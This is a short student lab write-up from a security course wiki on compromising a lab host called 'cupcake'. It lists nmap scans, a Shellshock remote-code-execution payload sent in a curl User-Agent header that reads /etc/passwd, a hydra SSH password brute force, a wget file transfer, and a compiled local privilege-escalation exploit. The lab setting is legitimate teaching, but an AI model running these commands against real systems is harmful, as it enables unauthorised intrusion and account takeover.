Activity 4.1 Exploiting Cupcake - Paiet/SEC-335 GitHub Wiki

• How you determined the versions of the two services exposed by cupcake

nmap -sV 10.0.5.23

• How you dealt with parsing nmap results with nmaptocsv

sudo nmap --top-ports=100 -Pn 10.0.5.23 -oG test.txt

nmaptopcsv -i test.txt -d ","

• The techniques you used to invoke remote code execution

nmap -sV -p 80 --script http-shellshock --script-args uri=/cgi-bin/status,cmd"echo ; /usr/bin/whoami" 10.0.5.23

curl -H 'User-Agent: () { :; }; echo ; echo ; /usr/bin/whoami' bash -s :'' http://10.0.5.23/cgi-bin/status

• The generation of a list of passwords and subsequent ssh brute force

curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd' bash -s :'' http://10.0.5.23/cgi-bin/status

zcat /usr/share/wordlists/rockyou.txt.gz| grep -i samwise > sammy.txt

hydra -l samwise -P sammy.txt 10.0.5.23 -t 4 ssh

• Transfer of files using python and wget

python -m HTTP.server 8086

wget http://10.0.99.128:8086/40839.c

• Compiling and running a privilege escalation exploit (It can be different than the demo!)

gcc 40839.c -o moose -lpthread -lcrypt

./moose

su - firefart

Refelections